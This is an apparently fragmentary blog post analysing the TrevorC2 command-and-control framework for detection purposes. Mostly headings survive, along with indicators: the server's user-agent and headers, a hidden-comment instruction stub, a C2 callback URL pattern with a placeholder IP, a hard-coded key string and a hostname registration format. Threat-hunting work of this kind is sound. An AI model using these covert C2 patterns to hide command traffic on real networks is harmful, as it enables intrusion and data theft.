Understanding & Detecting C2 Frameworks — TrevorC2

Introduction

TrevorC2

TrevorC2 is a client/server model for masking command and control through a normally browsable website. Detection becomes much harder as time intervals are different and does not use POST requests for data exfil.

General Flow

trevorc2_server.py

Configuration Constants
“Main” Function
User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
clone_site/index.html
“main_c2” Fucntion
RPQ Class
Server: IIS
{
'ztNZPDhjQXknRNu':'9x2Iq4rEqFqpAu12zQ+nkEFy9Dgc7nJuo5LZYt8STGs=',
'ZPHerPsYMHBByWd':'Vtnxa5nKPd56iwaYnC4R9LZQYL5BsSTl1w8fFbAq6dQ='
}
<meta http-equiv="Refresh" content="0; url=[Original URL]" />
Response from C2 when redirection is enabled
<!-- [STUB]=[Instructions] --></body>
Response from C2 containing instructions to execute by the client
SPQ Class
Page not found.
http(s)://[C2_IP]/images?guid=[Base64_Encoded_String]
Check against “magic_hostname”
Else branch
clone_site/received_[CLIENT_COOKIE].txt
UnknownPageHandler Class
Server Version

trevorc2_client.py

Client Constants
“connect_trevor” Function
Tr3v0rC2R0x@nd1s@w350m3#TrevorForget
"magic_hostname=" + [Machine Hostname]
Request to register client with C2
Server Response
Message on the command line
Main callback flow

Conclusion

Indicators

MITRE ATT&CK

--

--

I write about #Detection #ThreatHunting #WindowsInternals #Malware #DFIR and occasionally #Python.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Nasreddine Bencherchali

I write about #Detection #ThreatHunting #WindowsInternals #Malware #DFIR and occasionally #Python.